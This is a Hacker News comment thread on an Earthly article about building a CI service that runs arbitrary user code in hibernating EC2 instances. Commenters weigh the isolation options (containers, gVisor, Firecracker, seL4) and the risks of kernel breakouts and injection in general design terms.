[HN Gopher] Remote Code Execution as a Service
___________________________________________________________________
Remote Code Execution as a Service
Author : dijit
Score : 43 points
Date : 2023-03-07 19:29 UTC (3 hours ago)
(HTM) web link (earthly.dev)
(TXT) w3m dump (earthly.dev)
| rafark wrote:
| Aren't servers remote execution services?
| seanw444 wrote:
| You mean a VPS? Yes. An HTTP server, no. At least not by
| default / design.
| rkeene2 wrote:
| I also allow remote code execution, though interactively [0].
| Though I'm not using any VMs or anything like that for isolation.
|
| Note: All the interesting stuff is in /opt/appfs
|
| [0] https://rkeene.dev/js-repl/?arg=bash
| phphphphp wrote:
| Perhaps a dumb question but container breakouts are a problem for
| all sorts of services which have been addressed in different
| ways. Since your goal is not to prevent container breakouts but
| rather securely run third-party code, why did you choose to use
| EC2 over something like ECS or Lambda or Google Cloud Run which
| is already dealing with the security aspect on your behalf?
| Virtual machines seem less secure and less convenient.
| adamgordonbell wrote:
| Good question. Our goal is not just to run arbitrary code but
| to run it fast and cache rework. We are a CI service and speed
| is important. Brandon may be able to jump in with why not
| various options but it's hard to beat giving users powerful
| cloud machines to run their builds on.
|
| I myself did try to run buildkit in a Lambda as I think that
| would be low cost option. But I found it you couldn't make gRPC
| calls against a lambda and that is a hard requirement for us.
| AlexCoventry wrote:
| Are you concerned about AWS launching a competing service if
| you get significant traction?
| brandonschurman wrote:
| Some of the reason we went with EC2 over something like ECS
| is that we would need to run the container in privileged mode
| for some of our features to work. We also considered options
| like gVisor, but ultimately the EC2 route was a simple enough
| implementation that made it easy to manage the user's cache
| volumes, etc. We're also hoping to use Firecracker VMs in the
| near future.
| adamgordonbell wrote:
| Thanks for sharing this. One of the authors here.
|
| We built a service that executes arbitrary user-submitted code.
| An RCE service. It's the thing you're not supposed to build, but
| we had to do it.
|
| Running arbitrary code means containers weren't a good fit (
| container breakouts happen), so we are spinning up and down ec2
| instances. This means we have actual infrastructure as code (i.e.
| not just piles of terraform but go code running in a service that
| spins up and down VMs based on API calls).
|
| The service spins up and down EC2 instances based on user
| requests and executes user-submitted build scripts inside them.
|
| It's not the standard web service we were used to building, so we
| thought we'd write it up and share it with anyone interested.
|
| One cool thing we learned was how quickly you can Hibernate and
| wake up x86 EC2 instances. That ended up being a game-changer for
| us.
|
| Corey and Brandon did the building, I'm mainly just the person
| who wrote things down, but hopefully, people find this
| interesting.
| plicense wrote:
| I would suggest also looking at
| https://github.com/bazelbuild/remote-apis. Its essentially a
| standard API for remote (any binary) execution as a service and
| there are several reference implementations of it (Buildgrid,
| BuildBarn, Google's own service etc).
|
| And you can consider using gVisor to minimize container
| breakouts to a great extent.
| adamgordonbell wrote:
| I'll checkout that remote-apis link.
|
| gVisor was considered but so far it looks like the next
| iteration with be using firecracker vms. Our backend is
| buildkit and it can't run in gvisor containers without some
| work.
| xxpor wrote:
| Did you consider using firecracker?
| adamgordonbell wrote:
| Yeah, we totally did and actually Corey has been playing
| around with a POC for backing with firecracker. It's likely
| the next revision of this will use firecracker.
|
| So it wasn't so much disqualified as decided it wouldn't be
| the v1 solution. We wanted to get something out and get
| people on it and get feedback. So weren't afraid to spend
| some more computer dollars to do so.
| k__ wrote:
| I had the impression that's what fly.io was doing.
|
| Converting Docker images to run in VMs instead of containers.
| slondr wrote:
| Fly uses Firecracker like AWS Lambda, not full-fledged VMs
| like EC2.
| cptnntsoobv wrote:
| > One cool thing we learned was how quickly you can Hibernate
| and wake up x86 EC2 instances. That ended up being a game-
| changer for us.
|
| Could you talk more about it? Are you keeping a cache of
| hibernated EC2 instances and re-launching them per request?
| What sort of relaunch latency profile do you see as function of
| instance memory size?
| adamgordonbell wrote:
| A specific Ec2 instance is always serving one customer max.
| And builds are highly cachable, so the ec2 instance has an
| EBS volume on it with a big cache that Earthly uses to
| prevent rework.
|
| That instance is just sitting around waiting for gRPC
| requests that tell it to run another build. If it's idle for
| 30 minutes, it hibernates and then if another call comes back
| in a gRPC proxy wakes it back up.
|
| I don't know if the wake up time increases per the size of
| the cache in memory, I can check with Brandon but its much
| faster starting up an instance cold, mainly because buildkit
| is designed for throughput and not a quick startup.
|
| There are more details in the blog.
| iueotnmunto wrote:
| While container breakouts do happen, they're pretty rare. I'd
| be more concerned about any potential injection vectors in the
| go code, which could lead to a cloud breach if you're not
| careful ;)
| adamgordonbell wrote:
| Oh interesting. What were you imagining as the injection
| vector?
|
| The earthly backend runs on a modified buildkit so it is
| running the arbitrary code in a container, but it's also in
| its own VM. This was simpler then firecracker to get started
| but turned out to have pretty good performance and alright
| cost once we started suspending things.
| iueotnmunto wrote:
| More if you're running `provision --vm-name
| "$UserSuppliedData"` or similar. I don't know how you've
| built your wrapping tool, so I can't comment on how likely
| it would be, but I've seen such breakages IRL (I break
| things for a living ;) )
| brandonschurman wrote:
| Good point, we do have things locked down pretty well in
| our go code though. The instances can only be provisioned
| using an API, and that API doesn't allow for arbitrary
| user-supplied input.
| raesene9 wrote:
| There have been a bunch of Linux kernel privesc vulns that
| can be converted to container breakouts from standard Linux
| containers, just look at bounties from Google's kCTF (AFAIK
| they've had 10 different kernel vulns in 2 years)
|
| It's possible to mitigate/reduce them for sure, with
| appropriate hardening, but the Linux kernel is still quite a
| big attack surface.
| flangola7 wrote:
| What about kernels like seL4? I think everyone will abandon
| monolithic kernels one day because they have too much
| attack surface.
| [deleted]
| [deleted]
___________________________________________________________________
(page generated 2023-03-07 23:01 UTC)